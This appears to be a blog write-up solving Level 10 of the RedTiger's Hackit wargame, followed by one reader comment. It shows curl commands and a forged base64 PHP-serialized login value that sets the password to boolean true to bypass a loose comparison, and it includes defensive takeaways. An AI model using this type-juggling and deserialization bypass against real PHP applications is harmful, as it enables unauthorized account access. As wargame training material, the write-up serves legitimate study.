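# RedTiger's Hackit wargame: Level 10

The hidden `login` field is a base64-encoded PHP `serialize()` array that the browser sends back unchanged, so the server is deserializing data the client fully controls. In that format `s:N:"..."` is a string of length N and `b:1` is the boolean `true`; the forged value below keeps the array shape but replaces the password string with `b:1`. The level's server code is not shown, but the result is consistent with a loose (`==`) password comparison: in PHP a boolean `true` compares equal to any non-empty string other than "0", so the stored password never has to be known. Defensive takeaways: compare secrets strictly (`===` or `hash_equals()`), do not call `unserialize()` on client-supplied data (use a typed format such as JSON and validate each field's type), and integrity-protect any state that round-trips through the client (for example with an HMAC). Note that `--insecure` in the curl commands disables TLS certificate verification; it is acceptable here only because the target is a wargame host.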


# curl --silent --insecure --cookie-jar level10 --cookie level10 --request POST --data "password=646f6e745f7468726f775f73746f6e6573&level10login=Login" https://redtiger.dyndns.org/hackit/level10.php
                <b>Welcome to Level 10</b><br><br>
                Target: Bypass the login. Login as TheMaster<br>
                <br><br><br>
                <form method="post">
                        <input type="hidden" name='login' value="YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9">
                        <input type="submit" value="Login" name="dologin">
                </form>
                <br><br><br>
# echo -n "YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9" | base64 -d; echo
a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}
# echo -n 'a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;}' | base64
YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=
# curl --silent --insecure --cookie level10 --request POST --data "login=YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=&dologin=Login" https://redtiger.dyndns.org/hackit/level10.php | grep is:
<br><br>The password for the hall of fame is: <b>796f75536c76645465684861636b6974477261747a</b> <br><br>

1 comment:

Amone said...

Where did b:1 come from?